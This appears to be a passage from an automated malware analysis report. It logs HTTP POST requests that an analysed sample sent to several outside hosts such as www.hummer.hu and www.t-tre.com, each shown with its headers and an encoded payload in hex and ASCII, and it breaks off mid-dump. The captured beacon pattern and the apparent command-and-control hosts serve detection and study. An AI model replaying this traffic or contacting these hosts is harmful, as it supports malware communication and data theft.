65 6a 55 68 4b 37 71 79 30 49 46 6a 65 35 72 37 39 4a 32 30 6a 78 74 6a 39 64 48 56 2b 35 67 62 69 4c 63 62 67 79 72 61 37 52 52 4d 6b 44 74 4c 47 31 41 4c 6b 57 65 51 4b 70 58 63 55 53 55 63 5a 4c 62 69 6c 63 67 63 4b 30 33 64 42 71 30 57 42 38 65 31 2b 70 41 79 79 4f 49 44 39 75 67 49 39 69 6f 35 57 70 49 4a 42 35 53 6e 48 50 67 63 46 38 43 48 4d 59 45 41 7a 35 36 6a 51 77 32 41 70 50 6e 62 52 65 66 71 33 56 36 50 36 37 30 76 45 31 74 4b 78 75 42 62 65 65 2f 6d 54 44 50 57 72 31 4c 54 32 74 32 57 64 78 39 67 67 63 44 62 6c 6b 59 68 44 68 6a 61 6a 78 56 6e 7a 6a 63 31 55 77 6f 46 70 2f 6a 4f 2f 34 42 4c 49 52 55 50 38 63 6e 53 72 65 53 57 74 50 58 4d 65 73 2b 58 44 39 78 41 6a 50 47 78 45 6c 6d 6f 46 69 32 2f 6c 48 6e 56 62 5a 56 42 68 2b 46 69 63 6c 64 6d 48 Data Ascii: EC119OeIJP51L4kclvFkEbCPKeJdw0gdC+tiadPwsIYfk50ybWXstTLhFwQGFRqTTPlVErM4QsayZSvdUHjBqp/0sIhs2fD/sB/xS6JPE8WYw4p75nUrpT4FvKnfhipV5MDRcaIe9fMR67/G7RPwSPOp1PF6PPku1KWMAOA+5aR4NckGpeXFl9yRN6CQgQcp37gIMUBRK4kvSde3GXctoLTvinmDNIX+XO+lCa1m1DHjkyeQz7vEjnSqwD8FqwTZt/3g2My9CB/mxdRk4uHOcXaCbAHz+oDgG+EhIQEZ6uuejUhK7qy0IFje5r79J20jxtj9dHV+5gbiLcbgyra7RRMkDtLG1ALkWeQKpXcUSUcZLbilcgcK03dBq0WB8e1+pAyyOID9ugI9io5WpIJB5SnHPgcF8CHMYEAz56jQw2ApPnbRefq3V6P670vE1tKxuBbee/mTDPWr1LT2t2Wdx9ggcDblkYhDhjajxVnzjc1UwoFp/jO/4BLIRUP8cnSreSWtPXMes+XD9xAjPGxElmoFi2/lHnVbZVBh+FicldmH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 62 65 62 43 39 31 32 6b 4a 50 36 61 61 69 6e 2b 6c 46 72 64 79 70 59 55 36 6f 63 4c 4b 78 47 64 34 66 4c 2f 6f 6a 66 68 64 42 36 77 31 38 50 69 71 4a 58 74 6e 59 63 42 67 67 72 36 37 61 75 65 48 55 63 2b 48 53 77 5a 57 58 55 69 50 48 52 58 65 58 32 77 69 62 56 4f 4f 45 72 31 51 4d 43 61 62 61 5a 63 56 53 68 6a 7a 41 63 65 2b 6d 61 56 2f 72 4a 39 74 78 38 45 56 2f 76 30 41 72 31 6e 68 41 39 69 58 6c 43 49 71 67 47 37 5a 63 37 4e 46 35 47 2b 62 74 73 35 36 68 66 39 35 56 34 32 32 74 48 65 63 6c 39 6c 5a 6b 71 5a 69 61 71 53 62 38 43 76 38 49 66 63 58 43 69 43 36 35 74 47 58 79 79 47 55 2b 79 67 72 49 44 39 61 49 6d 36 4b 59 47 66 32 78 70 6c 62 34 30 57 36 4a 73 78 55 55 4a 78 4b 4b 56 55 32 62 41 75 52 6a 32 5a 39 73 4d 32 41 65 6b 4c 31 73 30 41 38 46 76 42 68 45 78 76 66 76 63 6d 30 75 6b 2b 66 50 37 69 6a 66 63 48 69 38 44 53 64 36 42 72 2f 75 6d 79 55 6e 5a 6b 38 52 6a 51 55 51 50 34 45 49 65 68 64 5a 4c 4d 64 45 55 66 73 52 51 67 41 68 44 65 56 6f 74 55 70 6f 47 43 71 48 6a 76 4c 37 33 54 62 52 56 70 34 72 4c 42 56 2f 66 72 54 4b 33 50 79 78 38 6a 43 6a 74 69 36 54 41 73 7a 6f 45 67 4c 38 77 2f 7a 35 53 42 51 64 61 43 53 78 63 57 2b 6c 45 78 38 42 57 39 37 79 32 73 39 77 42 56 6b 65 57 51 54 50 41 43 4e 53 73 45 42 56 35 71 31 5a 47 4b 36 32 43 54 75 33 37 50 57 4b 63 50 37 34 2f 46 56 4a 4d 4d 45 56 58 52 69 65 7a 58 4a 6d 44 35 59 68 57 6c 57 31 4b 66 4a 32 77 39 67 4d 36 45 56 55 6d 55 50 52 6d 45 4b 46 58 34 4d 41 6e 47 6d 59 42 75 52 45 70 41 2f 79 31 32 72 56 39 4c 44 39 58 6b 68 4f 47 48 39 32 2b 36 39 43 37 35 36 47 71 72 56 32 58 2b 2f 33 6d 41 71 51 64 30 54 5a 4b 6e 2f 43 75 4f 4b 55 67 57 58 76 50 36 63 73 6e 34 4b 55 52 4e Data Ascii: bebC912kJP6aain+lFrdypYU6ocLKxGd4fL/ojfhdB6w18PiqJXtnYcBggr67aueHUc+HSwZWXUiPHRXeX2wibVOOEr1QMCabaZcVShjzAce+maV/rJ9tx8EV/v0Ar1nhA9iXlCIqgG7Zc7NF5G+bts56hf95V422tHecl9lZkqZiaqSb8Cv8IfcXCiC65tGXyyGU+ygrID9aIm6KYGf2xplb40W6JsxUUJxKKVU2bAuRj2Z9sM2AekL1s0A8FvBhExvfvcm0uk+fP7ijfcHi8DSd6Br/umyUnZk8RjQUQP4EIehdZLMdEUfsRQgAhDeVotUpoGCqHjvL73TbRVp4rLBV/frTK3Pyx8jCjti6TAszoEgL8w/z5SBQdaCSxcW+lEx8BW97y2s9wBVkeWQTPACNSsEBV5q1ZGK62CTu37PWKcP74/FVJMMEVXRiezXJmD5YhWlW1KfJ2w9gM6EVUmUPRmEKFX4MAnGmYBuREpA/y12rV9LD9XkhOGH92+69C756GqrV2X+/3mAqQd0TZKn/CuOKUgWXvP6csn4KURN
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 70 43 66 74 30 69 70 79 49 2f 35 63 2b 55 34 74 44 58 76 53 61 65 32 63 37 59 68 61 5a 64 35 69 2f 6b 62 71 43 4b 37 30 42 39 4e 79 56 76 33 36 6d 55 32 2b 54 58 36 68 39 43 76 32 4b 36 52 78 73 65 57 6e 4a 49 4a 31 70 71 62 6a 42 79 75 67 71 48 50 78 6b 2f 53 53 2b 5a 6f 7a 63 6d 68 48 62 6d 2f 35 31 2b 63 52 49 5a 7a 75 69 36 75 76 35 70 4e 4a 69 75 73 6c 48 6a 45 76 67 37 50 74 66 78 4b 35 41 63 6c 76 65 6f 35 30 2f 74 6d 6d 4b 72 56 52 55 41 4e 30 71 31 31 74 49 2f 4c 6b 31 74 59 79 76 6b 4b 71 45 30 62 62 7a 64 35 77 37 51 7a 59 44 38 73 2b 51 58 59 63 42 61 4c 36 36 4b 6d 74 46 54 4d 35 35 39 6f 43 70 77 57 5a 54 6f 74 67 6b 67 57 42 6c 4f 63 4f 70 49 62 31 71 4c 34 64 6d 4d 30 65 72 41 43 54 47 47 4c 79 65 58 62 6d 79 5a 6f 62 55 66 45 49 6a 69 70 74 56 45 6a 30 36 46 4c 43 42 77 5a 38 33 68 49 56 66 53 66 70 69 62 6d 2b 2f 41 54 37 66 59 36 6d 54 6a 4b 30 34 64 78 56 6b 2f 50 38 46 6e 56 35 41 34 45 6f 4b 4f 50 39 41 6a 6f 56 6e 6a 64 4b 4c 6d 68 65 52 77 6c 79 2b 32 35 75 45 72 59 6c 51 4b 48 78 2b 4d 6d 56 47 4c 6f 6f 4e 57 65 62 48 30 35 57 6c 67 54 74 55 6c 2f 56 66 4f 2b 64 30 59 33 4f 46 5a 66 42 54 63 4f 43 4d 4c 68 33 48 78 64 4a 73 6c 4c 46 36 69 42 49 73 32 4a 4d 54 56 44 7a 37 36 6a 58 4c 71 38 38 59 62 4d 4a 37 66 35 6b 56 75 74 61 6a 42 69 74 7a 4a 79 68 68 31 2f 57 62 44 78 71 30 70 71 4e 64 4b 74 6e 36 66 49 64 30 34 59 78 79 6b 52 47 72 74 59 4e 35 76 77 5a 5a 56 35 73 44 5a 43 52 67 44 64 46 70 43 76 5a 61 7a 74 66 79 4b 55 2b 5a 57 62 56 62 69 49 63 44 72 6b 5a 77 6c 65 63 73 4c 71 63 66 55 38 6e 6d 42 78 39 68 62 61 66 67 56 72 67 38 4d 4d 39 72 44 2f 56 52 77 3d 3d Data Ascii: pCft0ipyI/5c+U4tDXvSae2c7YhaZd5i/kbqCK70B9NyVv36mU2+TX6h9Cv2K6RxseWnJIJ1pqbjByugqHPxk/SS+ZozcmhHbm/51+cRIZzui6uv5pNJiuslHjEvg7PtfxK5Aclveo50/tmmKrVRUAN0q11tI/Lk1tYyvkKqE0bbzd5w7QzYD8s+QXYcBaL66KmtFTM559oCpwWZTotgkgWBlOcOpIb1qL4dmM0erACTGGLyeXbmyZobUfEIjiptVEj06FLCBwZ83hIVfSfpibm+/AT7fY6mTjK04dxVk/P8FnV5A4EoKOP9AjoVnjdKLmheRwly+25uErYlQKHx+MmVGLooNWebH05WlgTtUl/VfO+d0Y3OFZfBTcOCMLh3HxdJslLF6iBIs2JMTVDz76jXLq88YbMJ7f5kVutajBitzJyhh1/WbDxq0pqNdKtn6fId04YxykRGrtYN5vwZZV5sDZCRgDdFpCvZaztfyKU+ZWbVbiIcDrkZwlecsLqcfU8nmBx9hbafgVrg8MM9rD/VRw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 75 77 76 62 77 73 55 38 4b 2f 35 6f 77 6d 46 74 37 49 63 55 54 6a 34 52 79 70 6d 54 62 34 52 77 79 53 56 70 53 39 45 55 46 49 41 50 65 2b 58 4e 44 4b 65 6c 38 6a 72 76 49 6c 47 46 4d 69 31 76 66 4b 6f 37 7a 4c 4a 6b 5a 53 61 48 4d 54 51 62 72 65 57 42 6a 66 4c 65 34 46 62 7a 56 5a 37 47 77 6e 2f 51 6f 2f 58 44 45 4f 6a 51 6e 76 48 6f 5a 56 57 55 77 6d 42 63 4b 65 4b 52 76 46 76 57 72 65 4f 76 65 46 76 30 79 57 6f 6d 61 35 66 32 49 4a 49 53 45 59 64 66 43 65 51 4f 76 55 34 30 70 44 6a 4f 43 49 55 4e 58 49 77 51 53 2b 38 44 51 68 59 55 6d 48 37 78 6b 7a 51 6b 48 35 72 52 54 46 48 70 43 6d 78 65 50 2b 6e 46 57 68 65 66 66 36 53 43 48 61 4f 2f 59 77 39 45 62 76 78 7a 46 57 47 49 64 6f 51 69 4b 33 38 34 61 48 53 70 58 55 31 38 46 50 37 37 65 74 4e 66 77 75 78 66 5a 52 76 36 79 58 2f 69 37 54 7a 64 69 5a 71 67 2f 73 67 4c 65 4a 52 73 70 78 6b 79 72 67 74 6f 47 75 66 4e 6b 6e 63 64 63 6e 33 2b 54 38 47 30 42 43 37 78 4d 30 48 4d 48 45 44 64 66 4c 37 37 76 73 4d 2b 6a 6a 68 38 53 6e 2f 47 7a 30 46 32 71 6b 67 54 63 4e 31 76 4f 61 55 63 61 6a 6a 44 4a 6c 67 48 66 36 51 72 54 51 41 41 69 6f 59 58 47 49 37 51 46 4d 55 62 71 58 7a 62 57 65 6d 37 38 51 65 6f 4f 64 50 42 66 67 2f 68 34 41 46 73 36 58 35 79 70 32 6d 6d 74 70 7a 53 33 74 58 35 63 6c 61 75 32 74 59 30 5a 50 35 35 38 65 6a 74 32 53 55 63 2f 4c 42 59 42 65 62 38 4d 31 62 63 54 4b 77 67 73 46 48 67 62 5a 31 53 69 75 56 51 39 77 78 32 4e 75 70 5a 4b 4d 65 6c 70 77 6a 6c 4c 4e 56 38 65 56 73 35 58 50 30 39 34 36 34 54 4d 41 4e 78 74 35 39 61 6a 2b 37 43 32 32 69 64 6a 7a 6c 57 74 47 74 57 45 47 2b 71 36 7a 56 32 6e 64 44 53 31 71 6e 6f 46 63 32 45 6e 49 2b 68 62 65 77 6a 63 51 3d 3d Data Ascii: uwvbwsU8K/5owmFt7IcUTj4RypmTb4RwySVpS9EUFIAPe+XNDKel8jrvIlGFMi1vfKo7zLJkZSaHMTQbreWBjfLe4FbzVZ7Gwn/Qo/XDEOjQnvHoZVWUwmBcKeKRvFvWreOveFv0yWoma5f2IJISEYdfCeQOvU40pDjOCIUNXIwQS+8DQhYUmH7xkzQkH5rRTFHpCmxeP+nFWheff6SCHaO/Yw9EbvxzFWGIdoQiK384aHSpXU18FP77etNfwuxfZRv6yX/i7TzdiZqg/sgLeJRspxkyrgtoGufNkncdcn3+T8G0BC7xM0HMHEDdfL77vsM+jjh8Sn/Gz0F2qkgTcN1vOaUcajjDJlgHf6QrTQAAioYXGI7QFMUbqXzbWem78QeoOdPBfg/h4AFs6X5yp2mmtpzS3tX5clau2tY0ZP558ejt2SUc/LBYBeb8M1bcTKwgsFHgbZ1SiuVQ9wx2NupZKMelpwjlLNV8eVs5XP09464TMANxt59aj+7C22idjzlWtGtWEG+q6zV2ndDS1qnoFc2EnI+hbewjcQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 70 43 66 74 30 69 70 79 49 2f 35 63 2b 55 34 74 44 58 76 53 61 65 32 63 37 59 68 61 5a 64 35 69 2f 6b 62 71 43 4b 37 30 42 39 4e 79 56 76 33 36 6d 55 32 2b 54 58 36 68 39 43 76 32 4b 36 52 78 73 65 57 6e 4a 49 4a 31 70 71 62 6a 42 79 75 67 71 48 50 78 6b 2f 53 53 2b 5a 6f 7a 63 6d 68 48 62 6d 2f 35 31 2b 63 52 49 5a 7a 75 69 36 75 76 35 70 4e 4a 69 75 73 6c 48 6a 45 76 67 37 50 74 66 78 4b 35 41 63 6c 76 65 6f 35 30 2f 74 6d 6d 4b 72 56 52 55 41 4e 30 71 31 31 74 49 2f 4c 6b 31 74 59 79 76 6b 4b 71 45 30 62 62 7a 64 35 77 37 51 7a 59 44 38 73 2b 51 58 59 63 42 61 4c 36 36 4b 6d 74 46 54 4d 35 35 39 6f 43 70 77 57 5a 54 6f 74 67 6b 67 57 42 6c 4f 63 4f 70 49 62 31 71 4c 34 64 6d 4d 30 65 72 41 43 54 47 47 4c 79 65 58 62 6d 79 5a 6f 62 55 66 45 49 6a 69 70 74 56 45 6a 30 36 46 4c 43 42 77 5a 38 33 68 49 56 66 53 66 70 69 62 6d 2b 2f 41 54 37 66 59 36 6d 54 6a 4b 30 34 64 78 56 6b 2f 50 38 46 6e 56 35 41 34 45 6f 4b 4f 50 39 41 6a 6f 56 6e 6a 64 4b 4c 6d 68 65 52 77 6c 79 2b 32 35 75 45 72 59 6c 51 4b 48 78 2b 4d 6d 56 47 4c 6f 6f 4e 57 65 62 48 30 35 57 6c 67 54 74 55 6c 2f 56 66 4f 2b 64 30 59 33 4f 46 5a 66 42 54 63 4f 43 4d 4c 68 33 48 78 64 4a 73 6c 4c 46 36 69 42 49 73 32 4a 4d 54 56 44 7a 37 36 6a 58 4c 71 38 38 59 62 4d 4a 37 66 35 6b 56 75 74 61 6a 42 69 74 7a 4a 79 68 68 31 2f 57 62 44 78 71 30 70 71 4e 64 4b 74 6e 36 66 49 64 30 34 59 78 79 6b 52 47 72 74 59 4e 35 76 77 5a 5a 56 35 73 44 5a 43 52 67 44 64 46 70 43 76 5a 61 7a 74 66 79 4b 55 2b 5a 57 62 56 62 69 49 63 44 72 6b 5a 77 6c 65 63 73 4c 71 63 66 55 38 6e 6d 42 78 39 68 62 61 66 67 56 72 67 38 4d 4d 39 72 44 2f 56 52 77 3d 3d Data Ascii: pCft0ipyI/5c+U4tDXvSae2c7YhaZd5i/kbqCK70B9NyVv36mU2+TX6h9Cv2K6RxseWnJIJ1pqbjByugqHPxk/SS+ZozcmhHbm/51+cRIZzui6uv5pNJiuslHjEvg7PtfxK5Aclveo50/tmmKrVRUAN0q11tI/Lk1tYyvkKqE0bbzd5w7QzYD8s+QXYcBaL66KmtFTM559oCpwWZTotgkgWBlOcOpIb1qL4dmM0erACTGGLyeXbmyZobUfEIjiptVEj06FLCBwZ83hIVfSfpibm+/AT7fY6mTjK04dxVk/P8FnV5A4EoKOP9AjoVnjdKLmheRwly+25uErYlQKHx+MmVGLooNWebH05WlgTtUl/VfO+d0Y3OFZfBTcOCMLh3HxdJslLF6iBIs2JMTVDz76jXLq88YbMJ7f5kVutajBitzJyhh1/WbDxq0pqNdKtn6fId04YxykRGrtYN5vwZZV5sDZCRgDdFpCvZaztfyKU+ZWbVbiIcDrkZwlecsLqcfU8nmBx9hbafgVrg8MM9rD/VRw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 45 43 31 31 39 4f 65 49 4a 50 35 31 4c 34 6b 63 6c 76 46 6b 45 62 43 50 4b 65 4a 64 77 30 67 64 43 2b 74 69 61 64 50 77 73 49 59 66 6b 35 30 79 62 57 58 73 74 54 4c 68 46 77 51 47 46 52 71 54 54 50 6c 56 45 72 4d 34 51 73 61 79 5a 53 76 64 55 48 6a 42 71 70 2f 30 73 49 68 73 32 66 44 2f 73 42 2f 78 53 36 4a 50 45 38 57 59 77 34 70 37 35 6e 55 72 70 54 34 46 76 4b 6e 66 68 69 70 56 35 4d 44 52 63 61 49 65 39 66 4d 52 36 37 2f 47 37 52 50 77 53 50 4f 70 31 50 46 36 50 50 6b 75 31 4b 57 4d 41 4f 41 2b 35 61 52 34 4e 63 6b 47 70 65 58 46 6c 39 79 52 4e 36 43 51 67 51 63 70 33 37 67 49 4d 55 42 52 4b 34 6b 76 53 64 65 33 47 58 63 74 6f 4c 54 76 69 6e 6d 44 4e 49 58 2b 58 4f 2b 6c 43 61 31 6d 31 44 48 6a 6b 79 65 51 7a 37 76 45 6a 6e 53 71 77 44 38 46 71 77 54 5a 74 2f 33 67 32 4d 79 39 43 42 2f 6d 78 64 52 6b 34 75 48 4f 63 58 61 43 62 41 48 7a 2b 6f 44 67 47 2b 45 68 49 51 45 5a 36 75 75 65 6a 55 68 4b 37 71 79 30 49 46 6a 65 35 72 37 39 4a 32 30 6a 78 74 6a 39 64 48 56 2b 35 67 62 69 4c 63 62 67 79 72 61 37 52 52 4d 6b 44 74 4c 47 31 41 4c 6b 57 65 51 4b 70 58 63 55 53 55 63 5a 4c 62 69 6c 63 67 63 4b 30 33 64 42 71 30 57 42 38 65 31 2b 70 41 79 79 4f 49 44 39 75 67 49 39 69 6f 35 57 70 49 4a 42 35 53 6e 48 50 67 63 46 38 43 48 4d 59 45 41 7a 35 36 6a 51 77 32 41 70 50 6e 62 52 65 66 71 33 56 36 50 36 37 30 76 45 31 74 4b 78 75 42 62 65 65 2f 6d 54 44 50 57 72 31 4c 54 32 74 32 57 64 78 39 67 67 63 44 62 6c 6b 59 68 44 68 6a 61 6a 78 56 6e 7a 6a 63 31 55 77 6f 46 70 2f 6a 4f 2f 34 42 4c 49 52 55 50 38 63 6e 53 72 65 53 57 74 50 58 4d 65 73 2b 58 44 39 78 41 6a 50 47 78 45 6c 6d 6f 46 69 32 2f 6c 48 6e 56 62 5a 56 42 68 2b 46 69 63 6c 64 6d 48 Data Ascii: EC119OeIJP51L4kclvFkEbCPKeJdw0gdC+tiadPwsIYfk50ybWXstTLhFwQGFRqTTPlVErM4QsayZSvdUHjBqp/0sIhs2fD/sB/xS6JPE8WYw4p75nUrpT4FvKnfhipV5MDRcaIe9fMR67/G7RPwSPOp1PF6PPku1KWMAOA+5aR4NckGpeXFl9yRN6CQgQcp37gIMUBRK4kvSde3GXctoLTvinmDNIX+XO+lCa1m1DHjkyeQz7vEjnSqwD8FqwTZt/3g2My9CB/mxdRk4uHOcXaCbAHz+oDgG+EhIQEZ6uuejUhK7qy0IFje5r79J20jxtj9dHV+5gbiLcbgyra7RRMkDtLG1ALkWeQKpXcUSUcZLbilcgcK03dBq0WB8e1+pAyyOID9ugI9io5WpIJB5SnHPgcF8CHMYEAz56jQw2ApPnbRefq3V6P670vE1tKxuBbee/mTDPWr1LT2t2Wdx9ggcDblkYhDhjajxVnzjc1UwoFp/jO/4BLIRUP8cnSreSWtPXMes+XD9xAjPGxElmoFi2/lHnVbZVBh+FicldmH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 62 65 62 43 39 31 32 6b 4a 50 36 61 61 69 6e 2b 6c 46 72 64 79 70 59 55 36 6f 63 4c 4b 78 47 64 34 66 4c 2f 6f 6a 66 68 64 42 36 77 31 38 50 69 71 4a 58 74 6e 59 63 42 67 67 72 36 37 61 75 65 48 55 63 2b 48 53 77 5a 57 58 55 69 50 48 52 58 65 58 32 77 69 62 56 4f 4f 45 72 31 51 4d 43 61 62 61 5a 63 56 53 68 6a 7a 41 63 65 2b 6d 61 56 2f 72 4a 39 74 78 38 45 56 2f 76 30 41 72 31 6e 68 41 39 69 58 6c 43 49 71 67 47 37 5a 63 37 4e 46 35 47 2b 62 74 73 35 36 68 66 39 35 56 34 32 32 74 48 65 63 6c 39 6c 5a 6b 71 5a 69 61 71 53 62 38 43 76 38 49 66 63 58 43 69 43 36 35 74 47 58 79 79 47 55 2b 79 67 72 49 44 39 61 49 6d 36 4b 59 47 66 32 78 70 6c 62 34 30 57 36 4a 73 78 55 55 4a 78 4b 4b 56 55 32 62 41 75 52 6a 32 5a 39 73 4d 32 41 65 6b 4c 31 73 30 41 38 46 76 42 68 45 78 76 66 76 63 6d 30 75 6b 2b 66 50 37 69 6a 66 63 48 69 38 44 53 64 36 42 72 2f 75 6d 79 55 6e 5a 6b 38 52 6a 51 55 51 50 34 45 49 65 68 64 5a 4c 4d 64 45 55 66 73 52 51 67 41 68 44 65 56 6f 74 55 70 6f 47 43 71 48 6a 76 4c 37 33 54 62 52 56 70 34 72 4c 42 56 2f 66 72 54 4b 33 50 79 78 38 6a 43 6a 74 69 36 54 41 73 7a 6f 45 67 4c 38 77 2f 7a 35 53 42 51 64 61 43 53 78 63 57 2b 6c 45 78 38 42 57 39 37 79 32 73 39 77 42 56 6b 65 57 51 54 50 41 43 4e 53 73 45 42 56 35 71 31 5a 47 4b 36 32 43 54 75 33 37 50 57 4b 63 50 37 34 2f 46 56 4a 4d 4d 45 56 58 52 69 65 7a 58 4a 6d 44 35 59 68 57 6c 57 31 4b 66 4a 32 77 39 67 4d 36 45 56 55 6d 55 50 52 6d 45 4b 46 58 34 4d 41 6e 47 6d 59 42 75 52 45 70 41 2f 79 31 32 72 56 39 4c 44 39 58 6b 68 4f 47 48 39 32 2b 36 39 43 37 35 36 47 71 72 56 32 58 2b 2f 33 6d 41 71 51 64 30 54 5a 4b 6e 2f 43 75 4f 4b 55 67 57 58 76 50 36 63 73 6e 34 4b 55 52 4e Data Ascii: bebC912kJP6aain+lFrdypYU6ocLKxGd4fL/ojfhdB6w18PiqJXtnYcBggr67aueHUc+HSwZWXUiPHRXeX2wibVOOEr1QMCabaZcVShjzAce+maV/rJ9tx8EV/v0Ar1nhA9iXlCIqgG7Zc7NF5G+bts56hf95V422tHecl9lZkqZiaqSb8Cv8IfcXCiC65tGXyyGU+ygrID9aIm6KYGf2xplb40W6JsxUUJxKKVU2bAuRj2Z9sM2AekL1s0A8FvBhExvfvcm0uk+fP7ijfcHi8DSd6Br/umyUnZk8RjQUQP4EIehdZLMdEUfsRQgAhDeVotUpoGCqHjvL73TbRVp4rLBV/frTK3Pyx8jCjti6TAszoEgL8w/z5SBQdaCSxcW+lEx8BW97y2s9wBVkeWQTPACNSsEBV5q1ZGK62CTu37PWKcP74/FVJMMEVXRiezXJmD5YhWlW1KfJ2w9gM6EVUmUPRmEKFX4MAnGmYBuREpA/y12rV9LD9XkhOGH92+69C756GqrV2X+/3mAqQd0TZKn/CuOKUgWXvP6csn4KURN
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 38 4e 52 76 41 63 4c 30 4a 50 34 58 37 72 4b 73 74 61 33 47 78 45 56 33 47 30 37 53 6c 7a 43 59 46 71 64 31 65 48 59 46 37 4b 51 4c 42 37 52 45 50 52 51 2b 59 65 4e 45 79 43 51 45 59 45 6e 6c 43 73 76 69 55 79 72 47 38 32 64 54 48 4e 6b 37 59 37 59 69 61 56 4e 58 6e 72 79 4b 59 37 65 4c 70 34 65 78 39 6f 49 4c 73 71 41 4f 32 41 58 57 7a 78 48 69 7a 6f 4a 59 52 49 51 4f 6a 39 30 79 76 57 75 37 33 4f 6c 58 6c 68 75 44 66 6e 52 71 48 35 34 70 63 39 4a 52 71 4d 78 79 59 75 31 4b 2b 6f 61 4b 76 4a 64 31 4e 63 56 66 63 76 73 57 5a 53 48 39 55 75 64 76 47 41 6a 45 31 44 37 50 5a 6e 79 70 52 6f 63 45 34 2f 77 76 32 7a 55 44 59 51 69 6a 4f 64 4b 42 59 4c 36 7a 65 31 70 42 4a 30 63 4c 4d 4d 36 69 45 49 49 30 61 35 39 6e 67 6a 39 44 58 55 78 31 32 59 65 47 46 61 4e 54 57 56 4a 4c 73 4e 64 33 65 6d 6d 68 6a 45 61 56 79 4c 75 54 55 69 5a 6d 59 48 52 72 49 55 2f 48 64 6c 5a 57 51 37 4c 4c 66 43 33 6c 79 36 79 49 4a 37 75 45 79 79 4e 61 55 38 45 6f 35 57 68 61 56 4c 4c 47 66 44 32 54 2f 36 58 48 50 6b 44 6d 44 4c 73 4b 71 5a 36 77 35 61 37 6f 6e 77 35 68 52 65 37 77 70 57 74 51 53 69 33 65 64 36 42 71 4e 5a 78 65 49 32 73 33 64 44 74 61 47 42 49 76 33 61 44 53 6e 64 62 68 59 6d 4b 68 4d 44 66 2b 68 31 7a 58 47 37 2f 35 53 65 66 56 64 32 42 36 38 64 64 67 52 6f 43 4e 78 44 37 62 32 4f 32 44 7a 52 61 38 43 65 73 53 49 4a 66 51 62 77 44 2b 6c 67 6b 4a 71 64 36 79 44 64 69 72 35 34 57 53 6d 50 6b 5a 71 73 6e 54 77 33 6d 58 4d 32 50 74 47 48 31 48 61 52 31 4d 57 47 72 68 52 67 64 54 54 50 64 35 76 65 2f 45 74 6a 71 70 71 71 49 55 38 55 75 2b 6b 30 43 54 55 68 64 66 6a 41 41 43 64 4f 4b 73 67 61 59 4d 32 47 55 35 4d 74 6e 6c 4b 62 62 73 49 67 3d 3d Data Ascii: 8NRvAcL0JP4X7rKsta3GxEV3G07SlzCYFqd1eHYF7KQLB7REPRQ+YeNEyCQEYEnlCsviUyrG82dTHNk7Y7YiaVNXnryKY7eLp4ex9oILsqAO2AXWzxHizoJYRIQOj90yvWu73OlXlhuDfnRqH54pc9JRqMxyYu1K+oaKvJd1NcVfcvsWZSH9UudvGAjE1D7PZnypRocE4/wv2zUDYQijOdKBYL6ze1pBJ0cLMM6iEII0a59ngj9DXUx12YeGFaNTWVJLsNd3emmhjEaVyLuTUiZmYHRrIU/HdlZWQ7LLfC3ly6yIJ7uEyyNaU8Eo5WhaVLLGfD2T/6XHPkDmDLsKqZ6w5a7onw5hRe7wpWtQSi3ed6BqNZxeI2s3dDtaGBIv3aDSndbhYmKhMDf+h1zXG7/5SefVd2B68ddgRoCNxD7b2O2DzRa8CesSIJfQbwD+lgkJqd6yDdir54WSmPkZqsnTw3mXM2PtGH1HaR1MWGrhRgdTTPd5ve/EtjqpqqIU8Uu+k0CTUhdfjAACdOKsgaYM2GU5MtnlKbbsIg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 52 57 78 49 2f 2b 62 69 4a 50 35 61 33 65 31 6d 67 52 30 73 2f 77 6d 5a 68 4a 76 47 61 72 67 62 65 73 56 52 4f 37 2b 68 53 42 50 45 53 69 69 42 63 78 54 75 4d 70 74 62 39 4e 7a 72 68 45 70 38 30 67 35 33 59 4d 64 4c 77 57 6c 74 43 6f 6b 42 55 64 33 6a 48 52 31 70 4e 6b 71 4a 79 39 79 45 42 79 34 65 4d 38 6c 41 6b 78 63 47 4e 57 4d 65 39 2f 79 4f 64 46 4a 71 4f 41 37 4b 32 38 75 71 67 65 6c 6d 6a 49 67 4f 5a 2f 72 33 33 62 34 34 4d 75 66 68 2f 69 6a 57 4d 38 67 33 79 63 76 34 4f 7a 30 41 74 45 39 41 66 56 33 31 2f 30 6a 65 42 6a 66 52 4f 47 71 51 2b 48 38 67 6d 4c 58 6d 4c 53 78 73 78 71 4c 5a 41 76 63 61 61 58 7a 35 63 77 6b 67 65 2b 47 2b 6b 69 44 4f 46 71 39 4d 6e 4d 